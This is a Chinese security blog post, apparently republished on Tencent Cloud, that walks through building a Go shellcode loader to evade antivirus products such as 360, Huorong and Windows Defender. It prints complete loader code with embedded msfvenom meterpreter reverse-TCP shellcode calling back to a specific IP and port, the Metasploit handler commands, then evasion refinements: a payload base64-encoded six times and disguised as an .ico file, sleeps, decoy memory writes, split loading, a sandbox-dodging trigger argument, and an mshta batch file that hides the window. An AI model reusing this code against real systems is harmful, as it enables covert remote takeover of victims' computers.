专栏首页乌鸦安全[文末抽奖] 免杀:GO实现shellcode加载器过360

[文末抽奖] 免杀:GO实现shellcode加载器过360

1. 背景介绍

现在很多内网环境中都安了各种各样的杀软,在做内网渗透时难免会四处碰壁。想到Go是一门较新的语言,免杀效果应该比较好,再加上现在网上主流的免杀都是c、c++、python一类的,涉及go的免杀较少,所以就想来做一个Go语言的免杀。

2. 基本原理

在攻击中,shellcode是一段用于利用软件漏洞的有效负载,shellcode是16进制的机器码,以其经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在寄存器eip溢出后,放入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

我们在做免杀时需要想办法将shellcode成功加载进电脑内存中并执行而绕过杀软的检测。

3. 实验环境

Golang go1.16.6 windows/amd64

vscode 1.49

SublimeText

windows10

metasploit v6.0.53-dev-

shellcode加载

先上代码:

package main

import (
  "io/ioutil"
  "os"
  "syscall"
  "unsafe"
)

const (
  MEM_COMMIT             = 0x1000
  MEM_RESERVE            = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40
)

var (
  kernel32      = syscall.MustLoadDLL("kernel32.dll")   //调用kernel32.dll
  ntdll         = syscall.MustLoadDLL("ntdll.dll")      //调用ntdll.dll
  VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")   //使用kernel32.dll调用ViretualAlloc函数
  RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")    //使用ntdll调用RtCopyMemory函数
  shellcode_buf = []byte{
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
    0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x51, 0x48, 0x8b,
    0x52, 0x20, 0x56, 0x4d, 0x31, 0xc9, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a,
    0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x41, 0x51, 0x8b, 0x42, 0x3c, 0x48,
    0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
    0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x44,
    0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,
    0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0x41, 0xc1, 0xc9,
    0x0d, 0xac, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
    0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
    0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
    0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
    0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
    0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
    0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
    0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0x01, 0x75, 0x2f, 0xe7, 0x41, 0x54, 0x49, 0x89, 0xe4,
    0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
    0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
    0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
    0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
    0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
    0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
    0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
    0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
    0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
    0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
    0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
    0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
    0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
    0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
    0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
    0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
    0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
  } //msfvenom生成的shellcode
)

func checkErr(err error) { 
  if err != nil {       //如果内存调用出现错误,可以报出
    if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告,但是程序运行成功,则不进行警报
      println(err.Error()) //报出具体错误
      os.Exit(1)
    }
  }
}

func main() {
  shellcode := shellcode_buf

    //调用VirtualAlloc为shellcode申请一块内存
  addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if addr == 0 {
    checkErr(err)
  }
    
    //调用RtlCopyMemory来将shellcode加载进内存当中
  _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
  checkErr(err)
    
    //syscall来运行shellcode
  syscall.Syscall(addr, 0, 0, 0, 0)
}

具体的代码原理都在代码注释中注明。

这里的shellcode是使用msf生成的:

 msfvenom -p  windows/x64/meterpreter/reverse_tcp  lhost=1.117.47.231 lport=3333 -f c

再用SublimeText,ctrl+h替换掉引号,把\x改成0x即可。

msf上线操作如下:

msfconsole
use exploite/mulite/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

成功上线

隐藏黑框可以在编译时使用命令:

go build -ldflags="-H windowsgui -w -s" ms.go

免杀效果

火绒:

金山毒霸:

迈克菲:

windowsdefender

360

查杀率较高,这里尝试一下分离免杀,将shellcode写入到文件中和加载器分离开,在加载器启动执行时再将shellcode从文件当中读取进来。

为了存储和读取时格式统一,这里将所有的shellcode统一以字符串的形式存储在1.txt中(即去除掉所有0x和,和空格回车),同样可以使用SublimeText,ctrl+h来进行替换,此处不再赘述。

在程序从1.txt中读取shellcode后,可以使用hex.DecodeString来将字符串转换为字节数组的形式存储。

test1.go

package main

import (
  "encoding/hex"
  "fmt"
  "io/ioutil"
  "os"
  "reflect"
  "syscall"
  "unsafe"
)

const (
  MEM_COMMIT             = 0x1000
  MEM_RESERVE            = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40
)

var (
  kernel32      = syscall.MustLoadDLL("kernel32.dll")
  ntdll         = syscall.MustLoadDLL("ntdll.dll")
  VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
  RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func Read2333() string {
  f, err := ioutil.ReadFile("1.txt")  //1.txt为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
  if err != nil {
    fmt.Println("read fail", err)
  }
  return string(f)
}

func checkErr(err error) {
  if err != nil {
    if err.Error() != "The operation completed successfully." {
      println(err.Error())
      os.Exit(1)
    }
  }
}

func main() {
  b := Read2333()
  fmt.Println(b)
  shellcode, err := hex.DecodeString(b)
  if err != nil {
    checkErr(err)
  }
  
  fmt.Println(shellcode)
  fmt.Println(reflect.TypeOf(shellcode))
  addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  if addr == 0 {
    checkErr(err)
  }
  _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))
  checkErr(err)
  syscall.Syscall(addr, 0, 0, 0, 0)
}

1.txt

fc4883e4f0e8cc00000041514150524831d265488b5260488b521851488b5220564d31c9488b7250480fb74a4a4831c0ac3c617c022c2041c1c90d4101c1e2ed52488b522041518b423c4801d0668178180b020f85720000008b80880000004885c074674801d050448b40204901d08b4818e35648ffc94d31c9418b34884801d64831c041c1c90dac4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000d0501752fe741544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5

修改之后的vt查杀率:

微步沙箱:

还是有些高。

改进

  1. 在程序执行过程休眠几次
  2. 把shellcode六次base64之后存入目录下的1.ico文件中,使用时读取、解码即可。
  3. 在shellcode载入内存前会压入一段其他字符串达到混淆的效果。
  4. 载入真正的shellcode时分段载入。
  5. 为了防止杀软上传云端执行使用,可以添加参数来唤醒,这里是 -b udp

具体代码如下:

package main

import (
  "encoding/base64"
  "encoding/hex"
  "flag"
  "fmt"
  "io/ioutil"
  "os"
  "syscall"
  "time"
  "unsafe"
)

const (
  MEM_COMMIT             = 0x1000
  MEM_RESERVE            = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40
)

var (
  ke  = syscall.MustLoadDLL("kernel32.dll")
  nt  = syscall.MustLoadDLL("ntdll.dll")
  vac = ke.MustFindProc("VirtualAlloc")
  rt  = nt.MustFindProc("RtlCopyMemory")
)

func checkErr(err error) {
  if err != nil {
    if err.Error() != "The operation completed successfully." {
      println(err.Error())
      os.Exit(1)
    }
  }
}

func Read2333() string {
  f, err := ioutil.ReadFile("1.ico")
  if err != nil {
    fmt.Println("read fail", err)
  }
  return string(f)
}

func Base64DecodeString(str string) string {
  resBytes, _ := base64.StdEncoding.DecodeString(str)
  return string(resBytes)
}

var ms string

func main() {
  ms1 := flag.String("b", "tcp", "scan method")
  flag.Parse()
  fmt.Println(*ms1)
  ms = *ms1
  if ms == "udp" {
    var c string = "qweqwdsfqweqwqwswqqweqdqwdqwdwqeqrwqeqwQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"
    addr1, _, err := vac.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    _, _, err = rt.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
    time.Sleep(time.Second * 3)
    var b string = Read2333()
    deStrBytes := Base64DecodeString(b)
    for i := 0; i < 5; i++ {
      deStrBytes = Base64DecodeString(deStrBytes)
    }
    sc, err := hex.DecodeString(deStrBytes)
    time.Sleep(time.Second * 3)
    addr, _, err := vac.Call(0, uintptr(len(sc)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    time.Sleep(time.Second * 1)
    if addr == 0 {
      checkErr(err)
    }
    _, _, err = rt.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)/2))
    time.Sleep(time.Second * 2)
    _, _, err = rt.Call(addr+uintptr(len(sc)/2), (uintptr)(unsafe.Pointer(&sc[len(sc)/2])), uintptr(len(sc)/2))
    time.Sleep(time.Second * 2)
    checkErr(err)
    time.Sleep(time.Second * 3)
    syscall.Syscall(addr, 0, 0, 0, 0)
  } else {
    fmt.Println("Hello,world!")
  }
}

1.ico

Vm10a01GVXlTblJXYmtwT1ZtMW9WbFpyV21GVlJsWnlXa2R3VGxKc1NsaFhhMXBoVkRGYWRHUjZTbFpXZWtJMFYxWmtTMVl5VGtsVmJHaHBWa1ZhYUZaR1ZsWk9Wa3BZVW10b2ExSlVWbFJWYlhoM1pXeFplVTFJYUZwV01IQllXVEJvVTFkSFNsVlNiV2hhVmpOb1IxUlZXbXRYUlRGV1pFZG9WMVpHV2tkWFYzUnJUa1pzVjFkcmFGVlhTRUpaV1ZSR1MxbFdVbGhqTTJoVFZqQldObGRyV25kVWJVcEhZMGhvVjFJelVsUlpiVEZYWTJzeFYxWnNaRmRTYTNCUVYxWmplRlJ0VVhoVldHUldZVE5TYjFSV2FFTmxSbXhXV1ROb1dsWXdjRmhaTUdoVFYwZEtWVkp0YUZwaE1WWTBXa1ZhYTFaV1JuSlBWazVUVFcxb05WWnJZM2hrTVdSeVRWVmFVRlpzV205YVYzaGhWVVpzYzFkc1pFOVNiVkphV1RCV1QyRldTblJrUkZaV1RWWktSRlpWV2xwbFJtUjBUMVpXYVZkRlNrMVhWbVI2WlVkT1YySkVXbE5pUlVwWVZXMTRkMlZzV1hoWk0yaFdUV3R3V0ZsVVRuTlZNa3BWVW1zNVlWWXphRmhVYTFwU1pERldjbVJIYkZOV1IzaEhWbFJHVTFJeGJGZFhhMmhvVTBWYVdWbHNVa2RVTVhCV1ZsUkdXRkpyTlZaVmJYTTFZVWRLUjFkVVJsZE5ibWhVV1cweFYxWnJOVmRoUm1ScFYwVkthRlpHWkRSV01EVlhXa2hLVm1KVlduQlZiRkp6VTFaYVNFMVhPVlZpVlhCWFZGVm9hMVpXWkVsUmJFNVZWbFpWZUZreFduZFRSMDVHVDFkc1YxWkdXalpXYWtaaFlURktjazFWWkdoTk1uaFVXV3hTUjFWR1ZuSldiR1JQWWtkU2VWWlhkREJoUjBZMlVteGFXbFpYVW5aV1J6RkhaRVpyZW1KR1ZsZFdhM0JJVmtaa2VrMVdTbGRVYkZaVFlYcFdjRlpzVWxka2JGbDVaRVpPYUdGNlJsZFViRnBYV1ZaSmVtRkhSbGRoTVZWNFdURmFVMlJIVGtoa1IyaG9aVzE0U2xadE1IaE9SbEp6VTJ0YVdHSnJOVlpaYkZKSFZURlNXR042Um10U2JFcGFXV3RrUjJGSFNrWldhbFpYVWpOU1ZGbHRjM2hXTWs1R1ZteG9WMUpVVm05WFZtUTBaREpKZUZWc2FFNVdWMUp3Vm14U1UwNVdXa2hOV0U1VlRXdGFlbGt3YUZOV1ZURklWV3hPVldKR1ZYaFZNRnBMWkVkT1IxRnNaRk5pU0VJMlZtdGtORlV5Um5SV2JHUnFVbXhhVmxaclZURlpWbXhZWkVWMGFsWnRVbnBYYTFVMVlVWmFWVlpyV2xaaVJrcElWa1JLUjJSR1ZuVlZiRlpwVW10d2FGWkdaSHBsUmtwWVVsaHdZVkp1UWs5WlZFWlhUVEZhUjJGSVpGTmhla1pZV1RCYVYyRkZNSHBSYXpsWFlXdEtXRlJzV210ak1WWnlVMnM1VTJKclNrcFdhMk40WWpGV1IxTnJXazlYUmtwWldWUktVMWRHYkZoamVrWlBZa1UxTUZwRlpFZFdNREZXVm1wT1YxSnNjRlJWYlhONFVqSktSMVpzWkdsV00yaFJWbTEwWVZNeVRYaFZiRnBXWWtWd2MxWnRNVFJsUmxWNVRWUlNXbFl3V25wWk1HaEhWbGRLU0ZWcmFGcFdSVVl6V2xaYWEyUkhSa2RqUm1SVFltdEpkMVpyV205a01WcHlUVmhLVDFOSGVGZFpiRkpIVlVaV2NsWnRSbXBpUjFKNVZsY3hNR0ZGTVZsUmExcFhUV3BGZDFaRVNrdFdiVTVKVTJ4V1YwMHdTbmxYVm1SNlRsWk9SMVZzVmxOaVZWcFlWV3hhV2sxR1drVlJiWFJXVFd0d1dGa3dXbGRYUjBwWVpVZEdZVll6YUdoWmVrWnJZekZXZFZOck5VNVNSM2hYVmxjd2VFMUdiRmhTYmxKYVpXdGFXVmxVU2xOVFJteFhWbFJHVjFZd1dUSlZNakZIVmpGS2NtTklhRmRTYldnelZtMHhWMk15VGtaaFJsWllVakpvVVZaWGRHRmtNazVIV2toU2FsSlVWbEJXYlRWRFYxWmFWMVZyVGxaU2JIQkhXVmh3UTFkR1duTlRiR2hhVm14VmVGWnNXbGRrUjFaSFVXeE9VMVpzYTNsV2FrWlRVekZaZVZKWVpFNVdWbHBZVm10V1MxVkdWbkZSYkZwT1VteEtWbFV5TVVkaFJURlpVV3hzVjAxcVJucFdSekZYWXpGS1dXSkdWbWhoTTBKVVZrZDRWazFXVGtkV2JGWlVZWHBzVDFsVVNqTmxiRnBIVjJ4T1dsWXdXa2haTUdoSFdWWkplbEZ0UmxwV00yaDVXa1JHVW1ReFZuTlhhelZUWWxob1dsWnNZM2hPUm1SeVRWaEtUbFpGTlZsV2JuQkhWakZ3VjFaVVJrOWlSVFZXVmtkek5WWXhTbGRXYWs1WFRXNVNjbFV5YzNoV01rNUpVbXhrYVZkRlNsRldWM0JEV1ZkU1IxcElVazVXYkhCUVZXMHhORlpzVlhoVmJHUlZUVlZzTkZVeU5VTlhSMHBIVTJ4U1dsWnNWWGRhVmxwaFpFZEtTRkp0YUdobGJGbzBWbXRhVTFNeFpISk5WbHBPVmtad1YxWnJWa3RWUm14WVRWWk9hVTFXU2pCWk1HUjNWR3N4V0dWR2JGZFNiRXBVVmtjeFIyUkhUalpTYkdocFYwVkthRlpHV2xabFJtUkhVMnhXVTJGNlZsUlVWVnAzWld4YVJWSnNUbXBoZWtaSFZHeFdiMWRHWkVsUmJFWlhZVEZWZUZscVJsTldWazV6V2tkc1UySllVVEZXVkVaVFVURnNWMU5ZYUdwVFJVcFdWbTE0UzFReFVsWlhibVJZVW0xU01GcFZaRWRoUjBwR1ZtcE9WMUo2UWpSV1YzTjRWbXM1Vmxac1ZtbFhSMmh2Vm0xMFlXTnRWbk5hU0VwV1lraENUMWxZY0ZkU2JGWlhWV3hPVlUxV2NFZFZiRkpIVjBkS1ZWSnNUbUZXYkZZMFdrVmFZVlpXU25KUFZUVnBVbFpaTVZacldtcGxSbFY1VW14YVRsWlhhRmRXYTFwaFZWWmFjbHBFVW1wU2JFb3hXVEJvVDJGR1NsVldibWhXVFZaS1dGWkhNVXRXTWtZMlVXeFdWMVl4U2xoV1IzUmhZekZhVjFKc2JHcFNNRnBVVlcwMVEwMUdXWGhYYkU1YVZqQmFlVlJzVW1GV1IwcFlZVVpDVlZZemFGaFViRnByVmpGd1IxcEhhRmRXUmxwS1ZsUkdVMUV4WkhSVGJGcFlZbXRLV1Zsc2FFTlZNVkp5VjI1T1QySkhVbHBaVlZVeFZUQXhWbU5JY0ZkTmJsSnlWVEp6ZUZKck9WZGhSbVJwVmpOb2IxWnRkRlpOVjA1WFdraEtZVkpVVm5OV2JGSkhVbXhzVmxwSVpGWlNhM0JKVmxjMVExWlhSWGhUYlVaaFZsWldORlJ0ZUU5WFYwWkdUMWQ0YVZORlNqUldhMlF3VlRKS2NrMVdXazVYUmtwVldXeG9RMkZHV25KWGEzUnFZa1pLVmxVeWVFdFViVXBJWlVob1YxWnRhSHBXTWpGSFkyc3hSVkZzYUZkU1dFSlJWMVpXVmsxV1NsZFdibEpwVWxSc1dGUldXbmRrYkZsNVRVaG9XR0Y2UmtoWmExcFhWbXhhUmxOck9WZGhhMXA2VkcxNFUxZEZNVlpQVjJ4WFlsaGplVlpYZUZOVU1WSjBVbTVPYVZKR2NGbFdhMVozVmtac1dHVklaRmRXYkVwYVYydFZNV0pIUmpaU1ZFcFhVak5vVkZaWGMzaGphekZYVm14V1dGSXphRkJYYkdRMFdWZE5lRnBJVWs1V1ZHeHdWV3hTVjJWR1dYbE5TR2hZWVhwR2VsbFVUbTlYUm1SSlVXMW9XbFpXY0hwYVJWcHJWbFpHYzFGc1RsTmhNVmw2Vm10YVlWVXlTbkpOVmxwT1ZteGFXRmxzVWtkVlJscHlWbTVLYTAxV1NuaFZNbmhyWVVVeFJXSkZXbFppUjJoNlZrUktSMlJIUmtsVmJGWllVMFZLVUZaSGVGWmxSVFZ6VTJ4V1UySlZXbGhWYWs1U1RXeGFTRTVZWkdoaVZscFlXVEJvVTFkR1drWmpSMFpoVmpOU2VWUldXbEpsUmxaelYyMTRVMVpHVlhsV2FrWlRWREZSZUZOcmFGWmlhM0JXV1d4b1ExbFdjRVZSVkZaWFZteGFWbFZYY3pWaFZscDBaRVJTVjFKRlNsUlpha3BMVWpKS1IyRkdhR2xXUlZwUlZsZDBhMkZ0VVhoVmJrcFdZa1Z3YzFscmFFTlNiRlY0Vld0a1dsWnJiRFJXYkZKSFYwWmFkRlZyWkZWV00wNDBXVEZhWVZkWFNraFNiR1JUVFd4R05sWnFTWGhrTVZsNVVtdGthbEpXV2xOWmJHaHZWVlphY1ZGWWFFOWlSMUo2VjJ0V2QxUnNXbFZTVkVwYVlUSk9ORlpFU2t0V01VcFZVbXhXYVZaRldtaFdSbFpoWXpBMWRGTnJhR3hTYTBwWVZXcE9VazFXV2tWUmJFNVVUV3R3UjFReFZtOVZNa3BaVVd4R1ZtRnJSWGhaTVZwcll6RndSbGR0ZUZOV1JsVjVWbGQ0YjJJeFVuTlhhMmhWWVd4YVZsbHNhRU5WTVZKeVZsUkdWMVpzY0ZaV1YzTTFWVEF4U0dSRVRsZFNSVXB5Vm1wS1MxSnJOVlZYYlVaVFRURktVRmRXWTNoVWJWWkhWV3hrVm1KRmNFOVZiRkpYWlVaYWMxVnJUbFZOYTNCWVZXeG9jMWRIUlhoVGJXaGFWbXhWZUZWc1drOVdWbEp6WTBkb2FHVnJTVEJXYTJRd1ZURldjazVWWkdwU2JGcGhXbGR6TVZsV2JGaGtSbHBPVW0xU1dGWlhNREZpUmxwMVVXeGFXR0ZyTlhKV01uTjRZekpPU0U5V1ZtbFNhM0JSVjFaU1FrMVdXbGhUYTJob1VtNUNXRlZ0ZEhkbFJsbDRWMjEwV0dGNlJrZFVWbFpYV1ZkV2NsZHJPVmRoYTBWNFdrVmFhMWRYVGtaWGF6Vk9Va1ZKTVZac1dtOWtNVkY0VjFob1dHSnNTbGxaYkdoRFVURlNWbGR1WkZOV2JIQldWVEo0ZDJGSFNraGtSRTVYVW5wV00xVjZTa3RXYXpGWlVteFNWMUpzY0ZKV2JYQkhVekpPVjFWWVpHRlNia0p6Vld4U1YxTldWWGhWYTA1YVZteHdSMVJzYUVkWFIwcFpVV3QwVlZac1ZqUlpNVnB6VG14S2RGSnNaRk5pUmxrd1ZtdFNRMVV4VlhsU2JGcFBWbGRvVjFsc2FHOWhSbHB5V2tVMWJHSkhVbmxXVjNSM1ZHc3hSVlpzV2xaaVJrcE1Wa1JLUzFZeFpIVlNiR2hwVWpGS1dWZFdVa2RrTWs1WFYyNVNhMUpVYkhOWmEyUXdUVEZhUlZKc1RsSmhla1o1VkZWb2MxWldaRWhoUlRsaFZqTm9lbFJyV210WFYwNUpWRzFvVjJKclNsZFdhMk40WkRGc1YxTllaRTVUU0VKWlZqQm9RMWxXY0ZkWGJrNVhWbXR3TUZwRlZUVldNVXAwWkhwQ1YxSnRhRE5WTWpGWFkyczFWbFp0YUd4aVJuQm9WMnhqZUZVeVRYaFZiazVoVW10d2NsUlZVbGRUVmxWNFZXdDBWV0pHY0VkV2JGSkRWbFprU1ZGc1pGVldNMDEzV2xaYVUyUkhSa1pQVms1VFlUTkNORlpyWkRSVk1rWjBWbXhrYWxKV1dsbFdhMVozVkRGc1dFMVhPV3BTYkVwWVZsZHpOV0ZHV25WUmExcFhWbnBGZDFaSGVHRlNhekZKWVVaV1YxSllRbEJXUm1SNlRsWk9SMVpzVmxWaVZWcFVWV3hTVjAxR1draGtSazVTVFd0YWVsbHJhRWRXUjBwWllVWkNWbUV4Y0VoVWJGcHJWMGRPUjFOck5WZFdSVmwzVmxSR1UxWXhWa2RYV0doVVltdGFWbFpzWkZOVlJteHlWMjVPVGsxVlNsWlVWVkYzVUZFOVBRPT0=

可以成功上线

如果想隐藏黑窗口的话可以调用win32的windowsapi,但是免杀效果不太好,所以这里去除黑框可以编写bat实现。使用bat调用exe的同时隐藏dos黑框:

1.bat

@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM
asd666.exe -b udp

成功上线

vt上传看看:

已经基本达到了预期免杀效果,国内的安全管家、360、火绒等均可以完美绕过。

本文分享自微信公众号 - 乌鸦安全(crowsec),作者:星期五实验室

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 免杀初探:python加载shellcode免杀与国内主流杀软大战六个回合

    本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf...

    FB客服
  • 远控免杀从入门到实践——工具总结篇

    在了解了免杀的一些基础知识和 Metasploit 自带的一些免杀方式之后,我开始学习和研究市面上知名度比较高的免杀工具,从互联网上找到了大约 30 多个免杀工...

    FB客服
  • 远控免杀专题(5)-Veil免杀(VT免杀率23/71)

    1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

    Ms08067安全实验室
  • 免杀 | 利用Python免杀CS Shellcode

    2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁...

    HACK学习
  • 干货 | Shellcode免杀总结<一>

    如果要把shellcode单独分离 我们可以通过其他当时获取到shellcode,而不是事先讲shellcode写死在程序中

    用户1631416
  • 内网渗透实验:基于Cobaltstrike的一系列实验

    去年年初发了一篇文章Web渗透实验:基于Weblogic的一系列漏洞,今年把这篇文章接力写一下。

    FB客服
  • 攻防演练对抗赛之初识文件钓鱼

    今年参加了几次攻防演练对抗赛,其它队伍依靠社工结合文件钓鱼得了不少分,自己之前并没有相关知识的积累,因此在这个方面吃了一些亏。

    FB客服
  • CS学习笔记 | 26、杀毒软件

    这一节将来看看杀毒软件相关的概念,毕竟知己知彼才能百战不殆,最后会介绍一下常见的免杀方法。

    TeamsSix
  • 远控免杀专题-shellcode免杀实践

    目前网上有很多的自动生成免杀shellcode的工具,但是要知道杀毒软件检测某个免杀工具也是非常容易的,因为这些流行工具的指纹很容易被杀软公司搜集到然后加入特征...

    洛米唯熊
  • 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

    编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。

    Ms08067安全实验室
  • 记一次攻防演练tips | 攻防tips

    关于信息收集,已经有方法论类的东西总结的很好了,我只说我喜欢的,以百度代替真实站点

    意大利的猫
  • 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)

    声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

    Ms08067安全实验室
  • pyinstaller打包逆向分析,顺便免杀Windows Defender

    乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任...

    乌鸦安全
  • Metasploit的简单木马免杀技术及后渗透面临的问题

